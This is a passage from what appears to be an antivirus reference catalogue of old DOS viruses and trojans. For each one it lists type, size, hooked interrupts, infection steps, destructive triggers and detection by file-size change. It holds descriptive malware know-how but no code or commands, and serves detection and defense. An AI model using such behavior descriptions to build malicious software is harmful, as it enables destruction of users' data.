The 408 virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[BOOJUM]
Virus Name: BOOJUM
Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
Virus Length: 340 Bytes (EXE)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself into memory (highest memory) by
hooking INT 21h.
2) It then executes the original file.
3) With itself loaded into memory it will infect any uninfected file
that is executed. b) It doesn't infect .COM files.
Damage: None
Detection method: Infected EXE files increase by 340 Bytes.
Note:
The BOOJUM virus doesn't hook INT 24h when infecting files. An
error message appears if there is an I/O error (such as write protect).
[Shirley]
Virus Name: SHIRLEY
Virus Type: Memory Resident, File Virus (infects .EXE files).
Virus Length: 4110 Bytes (EXE)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .COM files.
Damage: None
Detection method: Infected EXE files increase by 4110 bytes.
Note:
The Shirley virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[D-Tiny]
Virus Name: D-TINY
Virus Type: Memory Resident, File Virus (infects .COM files).
Virus Length: 126 Bytes (COM)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected COM files increase by 126 Bytes.
Note:
D-TINY doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[01-07]
Virus Name: 01-07
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 639 Bytes (COM)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether the system date is between the 1st and
the 6th of January. If "Yes", it shows the message:" Happy
New Year " on the screen and the system halts. If "No", the
virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: System halts when the system date is between the 1st and 6th
of January.
Detection method: Infected files increase by 639 Bytes.
Note:
The 01-07 virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Bit_Addict]
Virus Name: BIT_ADDICT
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 477 Bytes (COM)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: When the virus has already infected 100 files, it will
destroy all data on the hard disk, then show the message: "BIT
ADDICTMZ> .... The Bit Addict says: You have a good tasting hard disk,
it was delicious !!!"
Detection method: Infected files increase by 477 Bytes.
Note:
The BIT_ADDICT virus doesn't hook INT 24h when infecting files.
An error message appears if there is an I/O error (such as write
protect).
[CSL-2]
Virus Name: CSL-2
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 709 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 709 Bytes.
Note:
The CSL-2 virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Highland]
Virus Name: HIGHLAND
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 477 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: When the system date is the 29th, all files infected by
Highland can't be executed.
Detection method: Infected files increase by 477 Bytes.
Note: Highland doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[CMDR]
Virus Name: CMDR
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 4096 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 4096 Bytes.
Note:
The CMDR virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[POX]
Virus Name: POX
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 609 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 9h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest memory)
by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: POX hooks INT 9h, when the <Delete> key is pressed. The virus
will check the system date; if DAY=24, it will format the hard disk.
Detection method: Infected files increase by 609 Bytes.
Note:
The POX virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[SBC-1]
Virus Name: SBC-1
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) It then checks whether the "COMMAND.COM" file has been infected;
if "No", then it infects the file.
3) It then executes the original file.
4) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: Overwrites the original file, so the length of infected files
won't increase.
Detection method: None
Note: The SBC-1 doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Nov_17-1]
Virus Name: NOV_17-1
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 768 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) This virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 768 Bytes.
Note: The NOV_17-1 virus doesn't hook INT 24h when infecting files.
An error message appears if there is an I/O error (such as write
protect).
[HBT]
Virus Name: HBT
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 394 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: When the virus is resident in memory, a file can't be
executed, but only infected.
Detection method: Infected files increase by 394 Bytes.
Note:
The HBT virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Gotcha]
Virus Name: GOTCHA
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 906 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
4) It also infects when a file is renamed, file attributes are set,
search for a matching file or deleting a file.
Damage: None
Detection method: Infected files increase by 906 Bytes.
Note: The Gotcha virus hooks INT 24h when infecting files. Omits I/O
error (such as write protect).
[Voronezh-2]
Virus Name: VORONEZH-2
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 1600 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 1600 Bytes.
Note:
The Voronezh-2 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Amilia]
Virus Name: AMILIA
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 1614 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage:
1) If it is Sunday, a message is displayed on the screen: "Amilia I
virii - [NUKE] 1991 By Rock Steady/NUKE," then the system halts.
2) If it is between 4 and 5 o'clock in the afternoon, a smiling face
appears on the screen.
Detection method:
1) Infected files increase by 1614 Bytes.
2) A smiling face appears on the screen.
Note:
The Amilia virus hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[981]
Virus Name: 981
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 981 Bytes (COM), about 1010 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks the DOS version; if the DOS version is earlier than
3.0 it will show the message: " This program requires MS-DOS 3.0 or
later."
2) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest memory)
by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected .COM files increase by 981 Bytes, .EXE
files increase by 1010 Bytes.
Note: The 981 virus hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Gotcha-2]
Virus Name: GOTCHA-2
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 627 Bytes (COM), 527 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. a) Before it infects a file,
it will check the file name.
Damage: None
Detection method: Infected .COM files increase by 627 Bytes and .EXE
files increase by 527 Bytes.
Note:
The Gotcha-2 virus hooks INT 24h and closes the "control_break"
function when infecting files. It omits I/O errors (such as write
protect).
[Hungarian]
Virus Name: HUNGARIAN
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 749 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 8h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) If (Year=1990 and month >=6) then it will hook INT 8h.
3) It then executes the original file.
4) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: When Hungarian hooks INT 8h, it will set the Counter to 0xFFFF.
Each time when INT 8h is called, the counter will decrease by one.
When the counter equals zero (about one hour), it will begin to
destroy files. Whenever you run any file, it will be destroyed.
Detection method: Infected files increase by 749 Bytes.
Note: The Hungarian virus hooks INT 24h when infecting files.
It omits I/O errors (such as write protect).
[CK]
Virus Name: CK
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 1163 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 13h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The virus hooks INT 13h; some time later, the system will
produce sounds.
Detection method: Infected files increase by 1163 Bytes.
Note: The CK virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[2136]
Virus Name: 2136
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 2136 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 2136 Bytes.
Note: The 2136 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Casteggi]
Virus Name: CASTEGGI
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 2881 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 1Ch
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: When DAY>10, the virus will count time by hooking INT 1Ch.
About 6 minutes later, the screen image will be destroyed.
Detection method: Infected files increase by 2881 Bytes.
Note: The Casteggi virus hooks INT 24h when infecting files. It
omits I/O errors (such as write protect).
[Enola]
Virus Name: ENOLA
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 1865--1875 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 8h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: When the virus has stayed resident for 140 minutes and INT
21h has been called for more than 72 times, all data on the hard
disk will be destroyed.
Detection method: Infected files increase by 1865-1875 Bytes.
Note: The Enola virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Ontari03]
Virus Name: ONTARI03
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 2048 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded in memory it will infect any uninfected file
that is executed.
Damage: None
Detection method: Infected files increase by 2048 Bytes.
Note: The Ontari03 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[PCBB-B]
Virus Name: PCBB-B
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 3072 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 3072 Bytes.
Note: The PCBB virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Canna615]
Virus Name: CANNA615
Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 1568 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then checks whether the system date is Friday, and Seconds is
zero; if "Yes", then a message and a picture appear on the
screen: "LEGALIZE CANNA615" and a picture of a hemp leaf.
3) It then executes the original file.
4) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 1568 Bytes.
Note: The Canna615 virus hooks INT 24h when infecting files. It
omits I/O error (such as write protect).
[Magnum]
Virus Name: MAGNUM
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 2560 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 8h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 2560 Bytes.
Note:
1) The Magnum virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
2) The virus only runs under DOS 3.3.
[Lycee]
Virus Name: LYCEE
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 1788 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 8h, INT 9h
Execution Procedure:
1) Checks whether it resides in memory. If not, hooks INT 21h, INT 8h
and INT 9h, installs itself as memory resident, and then executes
the host program.
2) If the virus already resides in memory, it will proceed to execute
the host program directly.
Infection Procedure:
1) The virus Infects files by AH=4B in INT 21h. When an uninfected
program is executed, it will get infected.
2) Lycee will hook INT 24h before infecting files to ignore I/O errors.
Damage: If you haven't pressed any keys for a while (i.e., few minutes),
a small window will appear on the screen until you press a key.
Detection method: Infected files increase by 1788 Bytes.
Note: The Lycee virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
Remarks: The virus does timing by INT 8h. When the keyboard is not
hit for a certain period of time, the virus will open a small window
on the screen until a key is pressed.
[Brain2]
Virus Name: BRAIN2
Virus Type: Memory Resident, File Virus (infects .COM and .EXE files)
Virus Length: 1935 Bytes (COM and EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 1Ch
Infection Procedure:
1) It checks whether the system date is the 17th of November or the
6th of February; if "Yes", it will display some messages and play
music.
2) The virus then checks whether it is already loaded resident in
memory. If "No", it then loads itself resident into memory by
hooking INT 21h.
3) It then executes the original file.
4) It then checks whether the system date is the 1st of February,
July, September or December; if "yes", the virus will show a
flash square by hooking INT 1Ch.
5) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Infected files increase by 1935 Bytes.
Note: The Brain2 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Antiprnt]
Virus Name: ANTIPRNT
Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
Virus Length: 593 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest
memory) by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: If the DOS Version is later than 3.0, and "PRINTER" is
installed, then the virus will destroy data on the current disk.
Detection method: Infected files increase by 593 Bytes.
Note: The ANTIPRNT virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[ABC]
Virus Name: ABC
Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
Virus Length: 2912 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h,
INT 1Ch, INT 16h
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident in memory (highest memory)
by hooking INT 21h, INT 1Ch, INT 16h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) Doesn't infect COM files
and EXE files smaller than 20KB.
Damage: When the system date is the 14th, and the virus has been in
the memory for 55 minutes, the virus will destroy data on the hard
disk.
Detection method: Infected files increase by 2912 Bytes.
Note: The ABC virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[CivilWar]
Virus Name: Civilwar
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 599 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory (highest memory)
by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 599 Bytes.
Note: The Civilwar virus hooks INT 24h when infecting files. It
omits I/O errors (such as write protect).
[Leech]
Virus Name: Leech
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 1024 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 1024 Bytes.
Note: The Leech virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[302]
Virus Name: 302
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 302 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 302 Bytes.
Note: The 302 virus hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Little_Brother]
Virus Name: Little_Brother
Virus Type: Memory Resident, File Virus (Companion Virus)
Virus Length: 250 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .COM
files.
Damage: When an uninfected file is executed, the virus will create a
*.COM file with the same name as *.EXE file (example: run "AAA.EXE",
"AAA.COM" will be created by Little_Brother).
Detection method: Infected files increase by 250 Bytes.
Note: The Little_Brother virus hooks INT 24h when infecting files.
It omits I/O errors (such as write protect).
[ARCV-9]
Virus Name: ARCV-9
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 771 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 771 bytes.
Note: The ARCV-9 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[NG-914]
Virus Name: NG-914
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 914 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 914 Bytes.
Note: The NG-914 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Civil510]
Virus Name: Civil510
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 2080 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Infected files increase by 2080 Bytes.
Note: The Civil510 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[B3]
Virus Name: B3
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 483 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether the system date is the 26th of June;
if "Yes", then it will destroy all data on the hard disk; if
"No", the virus checks whether it is already loaded resident
in memory. If "No", it then loads itself resident into memory
by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: If the system date is the 26th of June, then the virus will
destroy all data on the hard disk.
Detection method: Infected files increase by 483 Bytes.
Note: The B3 virus hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[RKO-1]
Virus Name: RKO-1
Virus Type: Memory Resident, File Virus
Virus Length: None.
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether the system date is the 13th; if "Yes",
it destroys all data on the hard disk; if "No", the virus checks
whether it is already loaded resident in memory. If "No", it
then loads itself into resident memory by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed or when INT 21h is called by
AX=11h or AX=12h.
Damage: If system date is the 13th, then the virus will destroy all
data on the hard disk.
Detection method: None
Note: The RKO-1 virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Dame]
Virus Name: Dame
Virus Type: Memory Resident, File Virus (Mutation Engine)
Virus Length: None
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
4) After it has infected files, it will check the time. If the time
is between 12:00 A.M. and 12:30 A.M., it will show the message:
"Don't worry, you are not alone at this hour.... This Virus is
NOT dedicated to Sara. It's dedicated to her Groove (...That s
my name).. This Virus is only a test therefor .. be ready for
my Next Test..."
Damage: None
Detection method: None
Note:
1) The Dame virus hooks INT 24h when infecting files. It omits
I/O errors (such as write protect).
2) The virus will encode itself, before it infects files. And the
method of encoding depends on the time. So it will be different
in every file.
[7thson]
Virus Name: 7thson
Virus Type: Memory Resident, File Virus (Companion)
Virus Length: 321 or 307 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .COM files.
Damage: When you run an .EXE file, the virus will create a new .COM
file with the same name as .EXE file and the length equals to 321 or
307 Bytes.
Detection method: Check whether there are some COM files with length
equal to 321 or 307 Bytes.
Note: The 7thson virus hooks INT 24h and closes the "control_break"
command when infecting files. It omits I/O errors (such as write
protect).
[Geoff]
Virus Name: Geoff
Virus Type: Trojan
Virus Length: 5952 Bytes
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Doesn't infect any file or partition or boot sector.
2) Before destruction, it shows the message:
"Search And Destroy Loading v1.0 Bringing The Best And Latest
Warex....... Press [ENTER] to Start The Game."
3) It then destroys all data of all disks if drives are ready.
4) After destroying , it shows the message: "Hey Geoff You know what
happened a few days ago? Some friend asked me to get rid of
you,........ P.S. I have nothing personal against you! You just
FUCKED with the Cold Brother and I had to take you down, again."
Damage: Destroys all data on all disks if drives are ready.
Detection method: Check for files with length equal to 5952 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Geoff hooks INT 24h when destroying. It omits I/O errors (such as
write protect).
[CMOSKill]
Virus Name: Cmoskill
Virus Type: Trojan
Virus Length: 29 Bytes
PC Vectors Hooked: None
Damage: Deletes all CMOS data
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition or boot sector.
[Killboot]
Virus Name: Killboot
Virus Type: Trojan
Virus Length: 32000 Bytes
PC Vectors Hooked: None
Damage: Destroys all data in the BOOT SECTOR of C:\ and B:\, then
shows a line of codes and then the system halts.
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition.
[NUKEX]
Virus Name: NUKEX
Virus Type: Trojan
Virus Length: 469 Bytes
PC Vectors Hooked: None
Damage: Deletes all files on the hard disk (including all
subdirectories).
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition or boot sector.
[Fire]
Virus Name: Fire
Virus Type: Trojan
Virus Length: 4304 Bytes
PC Vectors Hooked: INT 24h
Damage: Destroys all data on all disks if drives are ready, then it
makes a sound.
Detection method: Check for files with length equal to 4304 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition or boot sector.
3) The Fire virus hooks INT 24h when destroying. It omits I/O errors
(such as write protect).
[Secto]
Virus Name: Secto
Virus Type: Trojan
Virus Length: 487 Bytes
PC Vectors Hooked: None
Damage: Destroys data on the boot sector of A:\.
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition.
3) Doesn't hook INT 24h when destroying. An error message appears if
there is an I/O error (such as write protect).
[MSK]
Virus Name: MSK
Virus Type: Trojan
Virus Length: 272 Bytes
PC Vectors Hooked: None
Damage: Destroys all data on the hard disk.
Detection method: Check for files with length equal to 272 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition or boot sector.
[Dropper]
Virus Name: Dropper
Virus Type: Trojan
Virus Length: 3103 Bytes
PC Vectors Hooked: None
Damage: Deletes all files on disks.
Detection method: Check whether there are files with 3103 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Doesn't infect any files or partition or boot sector.
3) Dropper doesn't hook INT 24h when destroying. An error message
appears if there is an I/O error ( such as write protect).
[RNA#1]
Virus Name: RNA#1
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 7296 Bytes(COM and EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for COM and EXE files on the C:\ drive.
2) If found, it then deletes them (deletes four files at a time).
3) When the files are deleted, the virus will create a file named
"ZSQA.TH" on drive C:\.
